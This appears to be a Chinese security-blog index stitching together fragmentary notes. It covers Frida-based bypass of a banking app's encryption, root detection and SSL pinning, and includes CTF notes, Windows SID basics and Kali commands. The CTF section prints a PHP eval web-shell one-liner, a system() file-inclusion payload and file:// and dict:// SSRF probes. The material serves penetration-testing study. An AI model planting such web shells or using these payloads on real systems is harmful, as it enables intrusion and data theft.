通过Frida绕过银行app加密实现明文传输
· 已root的安卓机(小于Android 10)
· adb —— 用于调试Android设备
· Frida —— 用于对apk内的部分验证代码进行Hook
· Burpsuite —— 用于抓包
· OpenSSL —— 用于生成证书及转换证书格式
· HTTPDecrypt —— 用于利用HTTP协议 远程加解密数据包
· Magisk —— 绕过银行app对root的检测
App双向SSL校验绕过
CTF笔记
#信息泄漏
目录遍历工具:disearch
.git文件恢复工具:GitHack
1 | git log |
svn泄漏/hg泄漏工具:dvcs-ripper
#文件包含
1 | <?php system('ls /');?> |
#命令执行
1 | echo "<?php @eval(\$_POST['a']);?>" >> shell.php |
#SSRF
#伪协议
1 | file:/// |
file:///var/www/html/flag.php //查看源代码
dict://127.0.0.1:$port$ //结合burp扫码端口
CISP-PTE课程
#操作系统安全
#WIndows操作系统安全
windows的用户标识:SID
1 | administartor:500--0x1f4 |
C:\windows\system32\config\SAM
HKEY_LOCAL+MACHINE\SAM\SAM\Domains\Account\Users\Names
查看用户SID:whoami/user
查看组SID:whoami/groups
查看用户特权:whoami/priv
查看服务SID:sc showsid server_name
ActiveMQ CVE-2015-5254 反序列化漏洞
ActiveMQ CVE-2016-3088 任意文件写入漏洞
redis未授权访问
kali常见指令
#KALI常见指令
1 | ps aux //查看进程 |